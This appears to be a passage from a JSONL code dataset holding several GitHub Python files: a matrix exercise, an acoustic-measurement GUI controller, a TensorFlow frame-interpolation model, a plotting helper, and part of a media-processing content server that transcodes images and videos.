<= col < len(matrix[row])):\n print(\"Invalid coordinates\")\n else:\n if command == \"Add\":\n matrix[row][col] += value\n elif command == \"Subtract\":\n matrix[row][col] -= value\n command, *other = input().split()\n\nprint_matrix(matrix)\n","repo_name":"marians1d/SoftUni","sub_path":"Python-Advanced/Multidimensional-Lists/Exercises2/Matrix-Modification/matrix_modification.py","file_name":"matrix_modification.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9153585728","text":"from src.controller.pantalla_con_graficas_controller import PantallaConGraficasController\nfrom src.core.domain.medidor_acustico import MedidorAcustico\nfrom src.core.provider.action_provider import ActionProvider\nfrom src.core.provider.repository_provider import RepositoryProvider\nfrom src.core.provider.subject_provider import SubjectProvider\nfrom src.core.domain.mensaje import Mensaje\n\n\nclass VistaDetalladaController(PantallaConGraficasController):\n\n\n def __init__(self, view):\n super().__init__(view)\n self.master = \"VistaDetallada\"\n self.string_repository = RepositoryProvider.provide_string_repository()\n self.vista_detallada_subject = SubjectProvider.provide_vista_detallada_subject()\n self.vista_detallada_subject.subscribe(on_next=lambda mensaje: self.procesar(mensaje))\n self.pantalla_principal_subject = SubjectProvider.provide_pantalla_principal_subject()\n self.medicion_repository = RepositoryProvider.provide_medicion_repository()\n self.medidor_acustico = MedidorAcustico()\n self.transformar_a_db_action = ActionProvider.provide_transformar_a_escala_logaritmica_normalizada_action()\n self.calculos_por_tipo_de_banda = {\n 'OCTAVA': self.medidor_acustico.obtener_medicion_en_octava,\n 'TERCIO_OCTAVA': self.medidor_acustico.obtener_medicion_en_tercio_octava\n }\n\n def on_cerrar_ventana(self):\n mensaje_activar_boton = Mensaje(destinatario=\"VistaPrincipal\", mensaje=\"ActivarBotonVistaDetallada\")\n self.pantalla_principal_subject.on_next(mensaje_activar_boton)\n self.view.ocultar_vista()\n\n def on_calcular(self):\n self.activar_progressbar()\n self.bloquear_controles()\n ponderacion_A_activa = self.view.verificar_ponderacion_A()\n tab_activa = self.view.get_tab_activa()\n medicion = self.medicion_repository.get_medicion()\n f_central = tab_activa.get_frecuencia_central_banda_seleccionada()\n self.calculos_por_tipo_de_banda.get(tab_activa.get_tipo())(\n medicion, f_central, ponderacion_A=ponderacion_A_activa)\n\n def on_mostrar_instrucciones(self):\n self.desactivar_boton_instrucciones()\n from src.core.domain.coordinador_de_vistas import CoordinadorDeVistas\n CoordinadorDeVistas.mostrar_vista(\"VistaDetalladaInstrucciones\")\n\n def desactivar_boton_instrucciones(self):\n self.view.desactivar_boton_instrucciones()\n\n def activar_boton_instrucciones(self):\n self.view.activar_boton_instrucciones()\n\n def finalizar_calculo(self, paquete):\n self.unbindear_evento_root(\"Configure\")\n self.mostrar_medicion_en_vista(paquete)\n self.desactivar_progressbar()\n self.desbloquear_controles()\n\n def mostrar_medicion_en_vista(self, medicion):\n nivel_respuesta_impulsional = medicion.get_nivel_respuesta_impulsional()\n self.view.graficar(nivel_respuesta_impulsional, medicion.get_curva_decaimiento())\n self.view.mostrar_tiempos_de_reverberacion(\n medicion.get_edt().get_rt(), medicion.get_t20().get_rt(), medicion.get_t30().get_rt())\n self.view.mostrar_parametros_de_linealidad(\n medicion.get_edt(), medicion.get_t20(), medicion.get_t30(), medicion.get_curvatura())\n\n def mostrar_error_lundeby(self):\n self.view.mostrar_error(self.string_repository.get_mensaje_error_lundeby())\n self.desbloquear_controles()\n self.desactivar_progressbar()\n\n def get_medicion(self):\n return self.medicion_repository.get_medicion()\n\n def activar_progressbar(self):\n self.view.activar_progressbar()\n\n def desactivar_progressbar(self):\n self.view.desactivar_progressbar()\n","repo_name":"GabrielPenaU3F/TrabajoTesis","sub_path":"Python/medidor_acustico/src/controller/vista_detallada_controller.py","file_name":"vista_detallada_controller.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19083903689","text":"import tensorflow as tf\nimport numpy as np\nfrom conf_tab import config\nbatch_norm = config.TRAIN.batch_norm\nkernel_size = config.TRAIN.kernel_size\n# import src.flownet2.flownet2 as flownet2\n# batch_size = config.TRAIN.per_gpu_batch_size\n# from src.training_schedules import LONG_SCHEDULE\nfrom copy import deepcopy\n# from skimage.io import imread\n# from model_pwcnet import ModelPWCNet, _DEFAULT_PWCNET_TEST_OPTIONS\nfrom my_pwc_net import nn\n\ndef conv2d_padding_same(inputs, numfilter, kernel_size=3, trainable=True, activate=None):\n return tf.layers.conv2d(inputs, numfilter, kernel_size, padding='same', kernel_initializer=tf.variance_scaling_initializer(),\n trainable=trainable, activation=activate)\n\n\ndef batchnorm(inputs, training):\n return tf.layers.batch_normalization(inputs, training=training)\n\ndef maxpool2d_same(inputs, poolsize=2, stride=2):\n return tf.layers.max_pooling2d(inputs, pool_size=poolsize, strides=stride, padding='same')\n\n\ndef bilinear_interp(im, x, y, name):\n \"\"\"Perform bilinear sampling on im given x, y coordinates\n\n This function implements the differentiable sampling mechanism with\n bilinear kernel. Introduced in https://arxiv.org/abs/1506.02025, equation\n (5).\n\n x,y are tensors specfying normalized coorindates [-1,1] to sample from im.\n (-1,1) means (0,0) coordinate in im. (1,1) means the most bottom right pixel.\n Args:\n im: Tensor of size [batch_size, height, width, depth]\n x: Tensor of size [batch_size, height, width, 1]\n y: Tensor of size [batch_size, height, width, 1]\n name: String for the name for this opt.\n Returns:\n Tensor of size [batch_size, height, width, depth]\n \"\"\"\n with tf.variable_scope(name):\n x = tf.reshape(x, [-1])\n y = tf.reshape(y, [-1])\n\n # constants\n num_batch = tf.shape(im)[0]\n # _, height, width, channels = im.get_shape().as_list()\n height, width, channels = tf.shape(im)[1], tf.shape(im)[2], tf.shape(im)[3]\n # x = tf.to_float(x)\n # y = tf.to_float(y)\n\n # height_f = tf.cast(height, 'float32')\n # width_f = tf.cast(width, 'float32')\n zero = tf.constant(0, dtype=tf.int32)\n\n max_x = tf.cast(tf.shape(im)[2] - 1, 'int32')\n max_y = tf.cast(tf.shape(im)[1] - 1, 'int32')\n # x = (x + 1.0) * (width_f - 1.0) / 2.0\n # y = (y + 1.0) * (height_f - 1.0) / 2.0\n\n # Sampling\n x0 = tf.cast(tf.floor(x), 'int32')\n x1 = x0 + 1\n y0 = tf.cast(tf.floor(y), 'int32')\n y1 = y0 + 1\n\n x0 = tf.clip_by_value(x0, zero, max_x)\n x1 = tf.clip_by_value(x1, zero, max_x)\n y0 = tf.clip_by_value(y0, zero, max_y)\n y1 = tf.clip_by_value(y1, zero, max_y)\n\n dim2 = width\n dim1 = width * height\n\n # Create base index\n base = tf.range(num_batch) * dim1\n base = tf.reshape(base, [-1, 1])\n base = tf.tile(base, [1, height * width])\n base = tf.reshape(base, [-1])\n\n base_y0 = base + y0 * dim2\n base_y1 = base + y1 * dim2\n idx_a = base_y0 + x0\n idx_b = base_y1 + x0\n idx_c = base_y0 + x1\n idx_d = base_y1 + x1\n\n # Use indices to look up pixels\n im_flat = tf.reshape(im, tf.stack([-1, channels]))\n im_flat = tf.to_float(im_flat)\n pixel_a = tf.gather(im_flat, idx_a)\n pixel_b = tf.gather(im_flat, idx_b)\n pixel_c = tf.gather(im_flat, idx_c)\n pixel_d = tf.gather(im_flat, idx_d)\n\n # Interpolate the values\n x1_f = tf.to_float(x1)\n y1_f = tf.to_float(y1)\n\n wa = tf.expand_dims((x1_f - x) * (y1_f - y), 1)\n wb = tf.expand_dims((x1_f - x) * (1.0 - (y1_f - y)), 1)\n wc = tf.expand_dims((1.0 - (x1_f - x)) * (y1_f - y), 1)\n wd = tf.expand_dims((1.0 - (x1_f - x)) * (1.0 - (y1_f - y)), 1)\n\n output = tf.add_n([wa * pixel_a, wb * pixel_b, wc * pixel_c, wd * pixel_d])\n # output = tf.reshape(output, shape=tf.stack([num_batch, height, width, channels]))\n output = tf.reshape(output, shape=tf.shape(im))\n return output\n\n\ndef meshgrid(height, width):\n \"\"\"Tensorflow meshgrid function.\n \"\"\"\n with tf.variable_scope('meshgrid'):\n x_t = tf.matmul(\n tf.ones(shape=tf.stack([height, 1])),\n tf.transpose(\n tf.expand_dims(\n tf.linspace(-1.0, 1.0, width), 1), [1, 0]))\n y_t = tf.matmul(\n tf.expand_dims(\n tf.linspace(-1.0, 1.0, height), 1),\n tf.ones(shape=tf.stack([1, width])))\n x_t_flat = tf.reshape(x_t, (1, -1))\n y_t_flat = tf.reshape(y_t, (1, -1))\n\n grid_x = tf.reshape(x_t_flat, [1, height, width])\n grid_y = tf.reshape(y_t_flat, [1, height, width])\n return grid_x, grid_y\n\ndef res_block(inputs, training=True, trainable=True, reuse=False):\n # with tf.variable_scope('res_block', reuse=reuse):\n h = inputs\n with tf.variable_scope('batchnorm1', reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=tf.nn.relu)\n with tf.variable_scope('batchnorm2', reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=None)\n h = h + inputs\n h = tf.nn.relu(h)\n return h\n\ndef ctx_net(inputs, name, training=True, reuse=False, trainable=True):\n # with tf.variable_scope('context_net_{}'.format(name)):\n h = inputs\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=7, trainable=trainable, activate=tf.nn.relu)\n h1 = h\n h = res_block(h, training=training, trainable=trainable)\n h2 = h\n h = res_block(h, training=training, trainable=trainable)\n h = tf.concat([h, h1, h2], axis=-1)\n return h\n\ndef rect_net(inputs, training=True, reuse=False, trainable=True):\n with tf.variable_scope('rect_net'):\n h = inputs\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=tf.nn.relu)\n for i in range(3):\n h = res_block(h, training=training, trainable=trainable)\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 3, kernel_size=3, trainable=trainable, activate=None)\n return h\n\ndef u_net(inputs, name, training=True, reuse=False, trainable=True, out_size=2):\n h = inputs\n filter_nums = [64, 128, 256, 256]\n # with tf.variable_scope('flow_net_{}'.format(name)):\n mid_feat = []\n for k, n_dim in enumerate(filter_nums):\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, n_dim, activate=tf.nn.relu, trainable=trainable)\n if k != len(filter_nums) - 1:\n mid_feat.append(h)\n h = maxpool2d_same(h)\n\n for n_dim, pre_f in zip(filter_nums[:-1][::-1], mid_feat[::-1]):\n h = batchnorm(h, training)\n shape_f = tf.shape(pre_f)\n h = tf.image.resize_bilinear(h, (shape_f[1], shape_f[2]))\n h = tf.concat([h, pre_f], axis=-1)\n h = conv2d_padding_same(h, n_dim, activate=tf.nn.relu, trainable=trainable)\n\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, kernel_size=3, activate=None, trainable=trainable)\n\n return h\n\ndef to_flow(inputs, name, training=True, reuse=False, trainable=True, out_size=2):\n h = inputs\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, 64, kernel_size=3, activate=tf.nn.relu, trainable=trainable)\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, kernel_size=3, activate=None, trainable=trainable)\n\n return h\n\n\ndef adaptive_warp(tgt_img, flow, kernel):\n '''\n :param tgt_img: shape = [b, h, w, 3]\n :param flow: shape = [b, h, w, 2]\n :param kernel: shape = [b, h, w, 25]\n :return src_img: shape = [b, h, w, 3]\n '''\n h, w, c = tf.shape(tgt_img)[1], tf.shape(tgt_img)[2], tf.shape(tgt_img)[3]\n '''\n kernel_size = kernel.shape[3]//2\n\n kernel_h = kernel[:,:,:,:kernel_size]\n kernel_v = kernel[:,:,:,kernel_size:]\n\n kernel_h = tf.tile(tf.expand_dims(kernel_h, -1), [1, 1, 1, 1, kernel_size])\n kernel_v = tf.tile(tf.expand_dims(kernel_v, -2), [1, 1, 1, kernel_size, 1])\n \n kernel_reshape = tf.reshape(tf.multiply(kernel_h, kernel_v), [-1, h, w, 1, kernel_size*kernel_size])\n '''\n kernel_reshape = tf.expand_dims(kernel, -2)\n warped_img = tf.contrib.image.dense_image_warp(image=tgt_img, flow=flow)\n input_x_padding = tf.pad(warped_img, [[0, 0], [kernel_size//2, kernel_size//2], [kernel_size//2, kernel_size//2], [0, 0]])\n\n src_img = None\n for i in range(kernel_size):\n for j in range(kernel_size):\n slice = tf.slice(input_x_padding, [0, i, j, 0], [-1, h, w, -1])\n if src_img == None:\n src_img = slice * kernel_reshape[:, :, :, :, i * kernel_size + j]\n else:\n src_img += slice * kernel_reshape[:, :, :, :, i * kernel_size + j]\n\n return src_img#, p_node\n\ndef downsampling(inputs, num_f, training=True, trainable=True):\n '''\n bn->relu->conv\n :param inputs:\n :param training:\n :param trainable:\n :return:\n '''\n h = inputs\n for i in range(2):\n # h = batchnorm(h, training=training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n if i==0:h = maxpool2d_same(h)\n return h\n\ndef upsampling(inputs, num_f, training=True, trainable=True):\n '''\n bn->relu->conv\n :param inputs:\n :param num_f:\n :param training:\n :param trainable:\n :return:\n '''\n h = inputs\n for i in range(2):\n # h = batchnorm(h, training=training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n if i==0: h = tf.image.resize_bilinear(h, size=[tf.shape(h)[1]*2, tf.shape(h)[2]*2])\n return h\n\ndef lateral(inputs, training=True, trainable=True):\n '''\n bn->relu->conv\n :return:\n '''\n h = inputs\n _, _, _, num_f = inputs.get_shape().as_list()\n for i in range(2):\n # h = batchnorm(h, training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n return h + inputs\n\ndef in_grid(inputs, num_f=32, training=True, trainable=True):\n h = inputs\n # h = batchnorm(h, training)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=tf.nn.relu)\n return h\n\ndef out_grid(inputs, num_f=3, training=True, trainable=True):\n h = inputs\n # h = batchnorm(h, training)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n return h\n\ndef gridnet(inputs, training=True, trainable=True):\n ch_sizes = [32, 64, 96]\n down_first_hs, down_second_hs, down_third_hs = [], [], []\n h = inputs\n '''\n downsample\n '''\n for i in range(3):\n if len(down_first_hs)==0:\n down_first_hs.append(in_grid(h, num_f=ch_sizes[0], training=training, trainable=trainable))\n else:\n down_first_hs.append(lateral(down_first_hs[-1], training=training, trainable=trainable))\n\n for i in range(3):\n tmp_h = downsampling(down_first_hs[i], num_f=ch_sizes[1], training=training, trainable=trainable)\n if len(down_second_hs): tmp_h += down_second_hs[-1]\n down_second_hs.append(tmp_h)\n\n for i in range(3):\n tmp_h = downsampling(down_second_hs[i], num_f=ch_sizes[2], training=training, trainable=trainable)\n if len(down_third_hs): tmp_h += down_third_hs[-1]\n down_third_hs.append(tmp_h)\n\n '''\n upsample\n '''\n for i in range(3, 6, 1):\n down_third_hs.append(lateral(down_third_hs[-1], training=training, trainable=trainable))\n\n for i in range(3, 6, 1):\n down_second_hs.append(lateral(upsampling(down_third_hs[i], num_f=ch_sizes[1], training=training, trainable=trainable) +\n down_second_hs[-1], training=training, trainable=trainable))\n\n for i in range(3, 6, 1):\n down_first_hs.append(lateral(upsampling(down_second_hs[i], num_f=ch_sizes[0], training=training, trainable=trainable) +\n down_first_hs[-1], training=training, trainable=trainable))\n\n return out_grid(down_first_hs[-1], num_f=3, training=training, trainable=trainable)\n\ndef synthesis_net(inputs, name='synthesis_net', training=True, trainable=True, out_size = 3, reuse=True):\n with tf.variable_scope(name, reuse=reuse):\n h = inputs\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, 128, kernel_size=7, trainable=trainable, activate=tf.nn.relu)\n\n h1 = batchnorm(h, training)\n h1 = conv2d_padding_same(h1, 128, trainable=trainable, activate=tf.nn.relu)\n h1 = batchnorm(h1, training)\n h1 = conv2d_padding_same(h1, 128, trainable=trainable, activate=None)\n h += h1\n h = tf.nn.relu(h)\n\n h2 = batchnorm(h, training)\n h2 = conv2d_padding_same(h2, 128, trainable=trainable, activate=tf.nn.relu)\n h2 = batchnorm(h2, training)\n h2 = conv2d_padding_same(h2, 128, trainable=trainable, activate=None)\n h += h2\n h = tf.nn.relu(h)\n\n h3 = batchnorm(h, training)\n h3 = conv2d_padding_same(h3, 128, trainable=trainable, activate=tf.nn.relu)\n h3 = batchnorm(h3, training)\n h3 = conv2d_padding_same(h3, 128, trainable=trainable, activate=None)\n h += h3\n h = tf.nn.relu(h)\n\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, trainable=trainable, activate=None)\n return h\n\n\ndef pyr_synthesis_net(warped_img1_pyr, warped_ctx1_pyr, training=True, reuse=False, trainable=True):\n last_f = None\n for i, (warped_img1, warped_ctx1) in enumerate(\n zip(warped_img1_pyr, warped_ctx1_pyr)):\n h = tf.concat([warped_img1, warped_ctx1], axis=-1)\n with tf.variable_scope('res_block_{}'.format(i), reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, trainable=trainable, activate=tf.nn.relu)\n h = res_block(h, training=training, trainable=trainable, reuse=reuse)\n if last_f is not None: h += last_f\n last_f = tf.image.resize_bilinear(h, [tf.shape(h)[1] * 2, tf.shape(h)[2] * 2])\n h = to_flow(h, name=None, training=training, reuse=reuse, trainable=trainable, out_size=3)\n return h\n\ndef model_interpolation(first_img_t, end_img_t, ctx_net, training=True, reuse=False, trainable=True):\n '''\n Compute Flow\n '''\n x_tnsr1 = tf.stack([first_img_t, end_img_t], axis=1)\n flow_pred1, flow_pyr1 = nn(x_tnsr1, reuse=reuse)\n flow_pred1 = flow_pred1[:, :, :, ::-1]\n x_tnsr2 = tf.stack([end_img_t, first_img_t], axis=1)\n flow_pred2, flow_pyr2 = nn(x_tnsr2, reuse=True)\n flow_pred2 = flow_pred2[:, :, :, ::-1]\n\n with tf.variable_scope('interpolation_net', reuse=reuse):\n t = 0.5\n\n '''\n Compute Mask\n '''\n mask = u_net(tf.concat([first_img_t, end_img_t], axis=-1), name='mask', out_size=1, training=training, reuse=reuse, trainable=trainable)\n mask = (mask + 1.0) * 0.5\n # mask1 = mask[:,:,:,0:1]\n # mask2 = mask[:,:,:,1: ]\n\n '''\n Compute Context\n '''\n # ctx1 = ctx_net.conv1_2(first_img_t)\n # ctx2 = ctx_net.conv1_2(end_img_t)\n\n '''\n Compute Kernel\n '''\n kernels = u_net(tf.concat([first_img_t, end_img_t], axis=-1), name='kernel', training=training, reuse=reuse, trainable=trainable, out_size=kernel_size*kernel_size*2)\n kernel1 = kernels[:, :, :, :kernel_size*kernel_size]\n kernel2 = kernels[:, :, :, kernel_size*kernel_size:]\n\n '''\n Warp Context and Input Images\n '''\n warped_img1 = tf.reshape(adaptive_warp(first_img_t, flow_pred1 * t, kernel1), tf.shape(first_img_t))\n warped_img2 = tf.reshape(adaptive_warp(end_img_t, flow_pred2 * (1-t), kernel2), tf.shape(end_img_t))\n\n # warped_ctx1 = tf.reshape(adaptive_warp(ctx1, flow_pred1*t, kernel1), tf.shape(ctx1))\n # warped_ctx2 = tf.reshape(adaptive_warp(ctx2, flow_pred2*(1-t), kernel2), tf.shape(ctx2))\n\n '''\n Fuse the Warped Images\n '''\n # res_img = synthesis_net(tf.concat([warped_img1, warped_ctx1, warped_img2, warped_ctx2], axis=-1), training=training, trainable=trainable, out_size=3, reuse=reuse)\n res_img = warped_img1 * mask + warped_img2 * (1.0 - mask)\n return res_img\n\nif __name__ == '__main__':\n pass","repo_name":"sunyasheng/video-frame-interpolation","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4891665439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 29 11:57:30 2014\n\n@author: arbeit\n\"\"\"\n\nfrom __future__ import division, print_function, absolute_import\nfrom numpy import exp, log, sqrt\nfrom scipy.misc import logsumexp\nimport numpy as np\nfrom copy import copy\nimport scipy.stats as stats\nimport cPickle as pickle\n\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\ndef plot_var_bias_mse(res, num_evid_samp, title, num_post_samples, num_imp_samples, dims, logarithmic = True, outfname = \"plot.pdf\"):\n ssize = sorted(res.keys())\n st = res[ssize[0]].keys()\n st_abs = []\n st_rel = []\n for s in st:\n if s.endswith(\"(relat)\"):\n st_rel.append(s)\n else:\n st_abs.append(s)\n st_abs.sort()\n st_rel.sort()\n st = copy(st_abs)\n st.extend(st_rel)\n estimators = res[ssize[0]][st[0]].keys()\n fig, axes = plt.subplots(ncols=max(len(st_abs), len(st_rel)), nrows = 2)\n \n some_val = res.values()[0]\n \n for i in range(len(st)):\n m = st[i]\n a = axes.flat[i]\n for e in estimators:\n if logarithmic:\n prestr = \"log \"\n else:\n prestr = \"\"\n x = num_evid_samp\n y = some_val[m][e] #np.array([res[i][m][e] for i in x]).flatten()\n a.plot(x, y, label=e)\n a.set_title(\"$\"+m+\"$\")\n a.set_xlabel(prestr + \"# imp samp\")\n a.set_ylabel(prestr + \"$\"+m+\"$\")\n a.autoscale(\"both\")\n a.set_aspect(\"auto\", adjustable=\"datalim\")\n lgd = axes[0,-1].legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n fig.suptitle(title + \"; dim=\" + str(dims)+\", \"\n + str(num_post_samples) + \" MCMC Samples, \"\n + str(num_imp_samples) + \" Importance Samples\")\n \n fig.tight_layout()\n fig.savefig(outfname, bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.close(fig)\n \n \n ","repo_name":"ingmarschuster/ModelSelection","sub_path":"modsel/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32537134381","text":"import RavenManager\nimport psutil\nimport platform \nfrom PIL import Image\nfrom colorthief import ColorThief\nimport hashlib \nimport datetime\nimport random\nimport asyncio\nimport ffmpeg\nimport os\nfrom werkzeug.utils import secure_filename\nimport psycopg2 \nimport json\nimport psutil\nimport pyvidia\nimport time\nfrom multiprocessing import Pool \nfrom shutil import copyfile\n\nclass Content(RavenManager.Raven):\n def __init__(self, config):\n # Make folders. \n self.baseDir = config['SERVER']['baseDir']\n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n if not os.path.exists(self.baseDir + 'images'):\n os.makedirs(self.baseDir + 'images')\n if not os.path.exists(self.baseDir + 'audio'):\n os.makedirs(self.baseDir + 'audio')\n if not os.path.exists(self.baseDir + 'videos'):\n os.makedirs(self.baseDir + 'videos')\n if not os.path.exists(self.baseDir + 'avatars'):\n os.makedirs(self.baseDir + 'avatars')\n self.config = config\n self.type = 'content'\n self.fast_storage = None\n self.cpu_count = psutil.cpu_count()\n self.max_transcodes = int(self.cpu_count / 4) - 1\n self.transcode_threads = 4\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage(self.baseDir)\n self.freeDisk = disk.free / 1024 # Should be KB, in theory\n self.transcodingCount = 0\n self.acceptingwork = 0\n self.prepare()\n self.sqlUserName = self.config['DATABASE']['username']\n self.sqlHost = self.config['DATABASE']['hostname']\n self.sqlPassword = self.config['DATABASE']['password']\n self.sqlDatabaseName = self.config['DATABASE']['database']\n self.connection = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n self.cursor = self.connection.cursor()\n self.failedList = []\n if self.cursor.connection:\n self.connectionWorks = True\n else:\n self.connectionWorks = False\n print(\"Connection failed. Exiting.\")\n exit(0)\n \n\n def __del__(self):\n print('Destroying content node.')\n self.cursor.close()\n self.connection.close()\n\n def updateFreeDiskSpace(self):\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage(self.baseDir)\n self.freeDisk = disk.free / 1024\n self.totalDisk = disk.total / 1024\n sql = \"UPDATE raven_servers SET storage_available = %s, storage_total = %s WHERE id = %s\"\n self.cursor.execute(sql, (self.freeDisk, self.totalDisk, self.config['SERVER']['serverID']))\n\n\n #####################################################\n ################### IMAGES ##########################\n #####################################################\n\n\n def getColourPalette(self, path):\n \"\"\"\n Gets a list of the four most dominant colours in the image.\n \"\"\"\n image = ColorThief(path)\n try:\n image = ColorThief(path)\n palette = image.get_palette(color_count=4)\n del image\n return palette\n except:\n del image\n return [[0,0,0], [255,0,0], [0,255,0], [0,0,255]]\n\n def getDiskStatus(self):\n if any(platform.win32_ver()):\n disk = psutil.disk_usage('C:')\n else:\n disk = psutil.disk_usage('/')\n status = {'total': disk.total, 'used': disk.used, 'free': disk.free, 'percent': disk.percent}\n return status\n \n # Processes an image. If it's a GIF, just stores the GIF as is, because Pillow doesn't really\n # have a good way to process GIFs, and when using the seek() method, frames routinely got heavily\n # artifacted. After spending a few weeks on it, I gave up and decided to just store GIFs as is.\n def processImage(self, size, imFile, isAvatar, imgData, baseDir, directory, datehash):\n image = Image.open(imFile)\n imgDat = {}\n imgDat['url'] = {}\n thisTime = time.time()\n if image.format == 'GIF' or image.format == 'gif':\n resTime = time.time()\n # allFrames = self.extractAndResizeFrames(imFile, size)\n imgDat['resize'] = (time.time() - resTime)\n retName = 'images/%s/waterfall_%s_%s.gif' % (directory, datehash, size[0])\n thumbName = baseDir + retName\n copyfile(imFile, thumbName)\n image.close()\n\n \n imgDat['url']['legacy'] = retName\n imgDat['url']['modern'] = retName\n with open(thumbName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5'] = m.hexdigest()\n imgDat['md5p'] = m.hexdigest()\n fh.close()\n \n else:\n resTime = time.time()\n if image.mode== 'CMYK' and image.mode != 'RGBA':\n image = image.convert('RGBA')\n image.thumbnail(size)\n\n imgDat['resize'] = (time.time() - resTime)\n retName = 'images/%s/waterfall_%s_%s.webp' % (directory, datehash, size[0])\n thumbName = baseDir + retName\n image.save(thumbName, quality=100)\n retNameP = 'images/%s/waterfall_%s_%s.png' % (directory, datehash, size[0])\n thumbNameP = baseDir + retNameP\n image.save(thumbNameP, quality=100)\n\n image.close()\n\n imgDat['url']['legacy'] = retNameP\n imgDat['url']['modern'] = retName\n\n with open(thumbName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5'] = m.hexdigest()\n fh.close()\n\n with open(thumbNameP, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n imgDat['md5p'] = m.hexdigest()\n fh.close()\n \n retSize = size[0] \n \n imgDat['time'] = (time.time() - thisTime)\n imgData[int(retSize)] = imgDat\n\n def prepare(self):\n try:\n if pyvidia.get_nvidia_device() is None:\n self.hasGPU = 0\n print(\"No GPU found\")\n else:\n self.hasGPU = 1\n print(\"GPU found\")\n except:\n self.hasGPU = 0\n print(\"Not on Linux, skipping GPU check\")\n self.hasGPU = 0\n self.acceptingWork = 1 \n\n def startDraining(self):\n self.acceptingWork = 0\n\n def stopDraining(self):\n self.acceptingWork = 1\n\n def getStatus(self):\n data = {}\n data['acceptingWork'] = self.acceptingWork\n data['transcodingCount'] = self.transcodingCount\n data['failedList'] = self.failedList \n return data\n\n\n #####################################################\n ################### VIDEOS ##########################\n #####################################################\n \n # Marks a video as in progress in the database. This is done as a separate thing, since during high periods of load, there can be\n # a wait. For example, on a system with four threads, only one video would process at a time - so the second, third, etc. that try to transcode \n # simultaneously have to wait until there's enough free cores. \n def markVideoInProgress(self, videoID):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', 'in_progress', videoID))\n link.commit()\n linkCursor.close()\n link.close()\n except:\n pass \n # We can probably get away with it...\n self.transcodingCount = self.transcodingCount + 1\n\n # Marks a video as failed in the database.\n def markVideoFailed(self, videoID, tempFile):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', 'failed', videoID))\n link.commit()\n linkCursor.close()\n link.close()\n except:\n self.failedList.append(videoID)\n finally:\n self.transcodingCount = self.transcodingCount - 1\n os.remove('tmp/' + tempFile)\n\n # Retrieves info on bitrate, dimensions, etc. \n def probeVideo(self, tempFile):\n try:\n probe = ffmpeg.probe('tmp/' + tempFile)\n video_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'video'), None)\n audio_stream = next((stream for stream in probe['streams'] if stream['codec_type'] == 'audio'), None)\n if audio_stream is not None:\n audio_present = True\n else:\n audio_present = False\n width = (int(video_stream['width']) / 2)\n height = (int(video_stream['height']) /2)\n try: \n bitrate = int(video_stream['bit_rate'])\n except:\n bitrate = 3000\n data = {}\n data['video_stream'] = video_stream \n data['audio_stream'] = audio_stream \n data['audio_present'] = audio_present\n data['width'] = width \n data['height'] = height \n data['bitrate'] = bitrate\n # Maybe something can go here in future to filter out unsuitable qualities. \n return data\n except 